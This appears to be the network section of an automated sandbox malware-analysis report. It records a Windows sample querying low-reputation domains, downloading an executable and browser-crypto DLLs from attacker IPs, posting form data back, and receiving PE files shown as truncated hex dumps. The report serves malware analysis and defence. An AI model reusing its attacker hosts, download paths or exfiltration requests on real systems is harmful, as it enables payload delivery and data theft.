Source: unknown	Network traffic detected: HTTP traffic on port 2080 -> 49720

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe	DNS query: readinglistforaugust1.xyz
Source: C:\Windows\explorer.exe	DNS query: readinglistforaugust2.xyz
Source: C:\Windows\explorer.exe	DNS query: readinglistforaugust3.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: readinglistforaugust3.xyz
Source:	DNS query: fastpool.xyz

Source: global traffic	HTTP traffic detected: GET /@Rarenut0.exe HTTP/1.1Host: swretjhwrtj.gqConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /824 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 188.34.200.103Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 4953Host: 188.34.200.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 188.119.112.104
Source: global traffic	HTTP traffic detected: GET //l/f/SRCFdHsBPvGyIjkLejU_/259f84897d08382fc97b5383558dbe35eed6ef86 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 188.119.112.104

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:49:11 GMTContent-Type: application/x-msdos-programContent-Length: 24576Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Tue, 17 Aug 2021 14:34:32 GMTETag: "6000-5c9c2374e92ba"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 4b c4 db 9d 2a aa 88 9d 2a aa 88 9d 2a aa 88 1e 36 a4 88 9c 2a aa 88 f4 35 a3 88 9f 2a aa 88 74 35 a7 88 9c 2a aa 88 52 69 63 68 9d 2a aa 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee fd 3a 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 00 00 00 20 00 00 00 00 00 00 78 12 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 16 00 0b 00 04 00 00 00 00 00 00 00 00 60 00 00 00 10 00 00 83 62 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 2e 00 00 28 00 00 00 00 50 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 22 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 84 03 00 00 00 40 00 00 00 10 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 0a 00 00 00 50 00 00 00 10 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:49:12 GMTContent-Type: application/x-msdos-programContent-Length: 439296Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Tue, 24 Aug 2021 06:49:01 GMTETag: "6b400-5ca48876363f2"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ce 1e c0 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6e 05 00 00 7a 8a 02 00 00 00 00 1e 24 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 8f 02 00 04 00 00 05 e4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 c0 05 00 51 00 00 00 f0 b5 05 00 3c 00 00 00 00 d0 8e 02 98 c5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 81 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9d 05 00 18 00 00 00 d8 9c 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 6c 05 00 00 10 00 00 00 6e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 81 40 00 00 00 80 05 00 00 42 00 00 00 72 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f2 88 02 00 d0 05 00 00 3a 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 c5 00 00 00 d0 8e 02 00 c6 00 00 00 ee 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Aug 2021 06:49:20 GMTContent-Type: application/x-msdos-programContent-Length: 109568Connection: keep-alivelast-modified: Mon, 23 Aug 2021 18:01:19 GMTetag: "1ac00-5ca3dcddc8b80"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4960Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jYT9%2B1I%2BjjAnm2XWT560m1mLsoq%2FbAP8fujchcVFmM7uWppTk1X2%2FmDet944LkCTZRvTuoKplne%2FOHLA1lCoWYZdKmeGVf18CDkHhv376zg993Y7Fvatv4dyvu29cINpcA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 683aa3e21b202b89-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 4b b7 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 01 00 00 0c 00 00 00 00 00 00 aa a6 01 00 00 20 00 00 00 c0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a6 01 00 4f 00 00 00 00 c0 01 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 3c a6 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 98 01 00 00 20 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 04 00 00 00 c0 01 00 00 08 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 01 00 00 04 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZK0 @ @XO< H.text `.rsrc@@.reloc@B
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:49:22 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:49:22 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:49:22 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:49:22 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:49:23 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:49:23 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:49:23 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:49:23 GMTCache-Control: max-age=86400X-Cache-Status: HITX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 